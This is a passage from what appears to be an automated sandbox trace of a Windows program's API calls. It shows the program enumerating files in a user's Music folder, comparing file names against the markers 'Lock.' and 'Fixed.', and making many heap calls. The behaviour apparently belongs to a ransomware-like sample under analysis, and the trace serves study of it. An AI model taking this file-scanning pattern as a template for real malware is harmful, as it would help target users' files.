[0251.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0251.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0251.579] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.579] FindNextFileW (in: hFindFile=0xaa5660, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64b0faa0, ftCreationTime.dwHighDateTime=0x1d4ca0e, ftLastAccessTime.dwLowDateTime=0x95764540, ftLastAccessTime.dwHighDateTime=0x1d4cf4b, ftLastWriteTime.dwLowDateTime=0x95764540, ftLastWriteTime.dwHighDateTime=0x1d4cf4b, nFileSizeHigh=0x0, nFileSizeLow=0xe8b1, dwReserved0=0x24aa8c0, dwReserved1=0x25c6e50, cFileName="T3QpSK22qbSdU8p8YAX.m4a", cAlternateFileName="T3QPSK~1.M4A")) returned 1 [0251.579] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.579] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.579] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.579] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.579] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.579] FindNextFileW (in: hFindFile=0xaa5660, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3242ba0, ftCreationTime.dwHighDateTime=0x1d4d020, ftLastAccessTime.dwLowDateTime=0x7ad8f430, ftLastAccessTime.dwHighDateTime=0x1d4d040, ftLastWriteTime.dwLowDateTime=0x7ad8f430, ftLastWriteTime.dwHighDateTime=0x1d4d040, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x24aaec0, dwReserved1=0x25c6e50, cFileName="VvGsoQYq1", cAlternateFileName="VVGSOQ~1")) returned 1 [0251.579] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.580] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.580] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.580] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.580] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.580] FindNextFileW (in: hFindFile=0xaa5660, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33778d30, ftCreationTime.dwHighDateTime=0x1d4c59c, ftLastAccessTime.dwLowDateTime=0x5cdbd2b0, ftLastAccessTime.dwHighDateTime=0x1d4d41c, ftLastWriteTime.dwLowDateTime=0x5cdbd2b0, ftLastWriteTime.dwHighDateTime=0x1d4d41c, nFileSizeHigh=0x0, nFileSizeLow=0x16f0, dwReserved0=0x24a9708, dwReserved1=0x25c6e50, cFileName="xBQp6dTr52cBE6l-Un.m4a", cAlternateFileName="XBQP6D~1.M4A")) returned 1 [0251.580] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.580] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.580] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.580] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.580] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.580] FindNextFileW (in: hFindFile=0xaa5660, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31000460, ftCreationTime.dwHighDateTime=0x1d4d30c, ftLastAccessTime.dwLowDateTime=0x5e0e5bf0, ftLastAccessTime.dwHighDateTime=0x1d4d0be, ftLastWriteTime.dwLowDateTime=0x5e0e5bf0, ftLastWriteTime.dwHighDateTime=0x1d4d0be, nFileSizeHigh=0x0, nFileSizeLow=0x267b, dwReserved0=0x24aa8c0, dwReserved1=0x25c6e50, cFileName="XeP-i8.m4a", cAlternateFileName="")) returned 1 [0251.580] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.580] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.580] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.580] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.580] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.581] FindNextFileW (in: hFindFile=0xaa5660, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x25c6d68, ftCreationTime.dwHighDateTime=0x25c6a58, ftLastAccessTime.dwLowDateTime=0x10, ftLastAccessTime.dwHighDateTime=0x24b2de8, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x240d650, nFileSizeHigh=0x25c6a58, nFileSizeLow=0x25c6b70, dwReserved0=0x24aaec0, dwReserved1=0x25c6e50, cFileName="\x25b9\x34\xf1dc\x8b\x3cc6\x01\xff78\x8b\x1ecd\x771a\x25b9\x34\xfffe\xffff\xe36c\x7715\xe0d2\x7715\x9870\x24a\x9708\x24a\x10", cAlternateFileName="\x8e1a\x40\x8154\x241\xf47c\x8b\x8614\x4a\x3cfb\x40\x8178\x4a\xf580\x8b\xf484\x8b\x3d76\x40\xf4a0\x8b\xf580\x8b\x85f4\x4a\x61")) returned 0 [0251.581] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.581] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.581] FindClose (in: hFindFile=0xaa5660 | out: hFindFile=0xaa5660) returned 1 [0251.581] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.581] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.581] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0251.582] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0251.582] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0251.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="desktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0251.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0251.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0251.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0251.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0251.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0251.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0251.582] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0251.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="desktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0251.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0251.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0251.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0251.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0251.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0251.582] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0251.582] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0251.583] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0251.583] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0251.583] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.583] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0251.583] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.583] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0251.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0251.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0251.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0251.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0251.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0251.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0251.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0251.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0251.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0251.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0251.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0251.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0251.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0251.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0251.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0251.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0251.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0251.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0251.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0251.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0251.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0251.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0251.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0251.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0251.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0251.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0251.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0251.584] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0251.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0251.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0251.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0251.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0251.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0251.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0251.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0251.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0251.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0251.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0251.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0251.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0251.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0251.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0251.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0251.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0251.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0251.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0251.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0251.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0251.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0251.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0251.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0251.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0251.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0251.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0251.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0251.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0251.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0251.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0251.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0251.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0251.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0251.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0251.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0251.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0251.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0251.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0251.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0251.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0251.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0251.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0251.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0251.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0251.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0251.587] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0251.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0251.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0251.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0251.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0251.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0251.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0251.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0251.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0251.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0251.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0251.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0251.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0251.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0251.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0251.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0251.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0251.588] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0251.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0251.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0251.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0251.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0251.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0251.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0251.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0251.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0251.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0251.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0251.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0251.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0251.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0251.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0251.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0251.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0251.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0251.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0251.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0251.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0251.589] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x1160530, dwReserved1=0xb6f8, cFileName="desktop.ini", cAlternateFileName="")) returned 0xaa5660 [0251.589] FindClose (in: hFindFile=0xaa5660 | out: hFindFile=0xaa5660) returned 1 [0251.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0251.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0251.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0251.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0251.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0251.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0251.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0251.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0251.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0251.590] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0251.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0251.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: 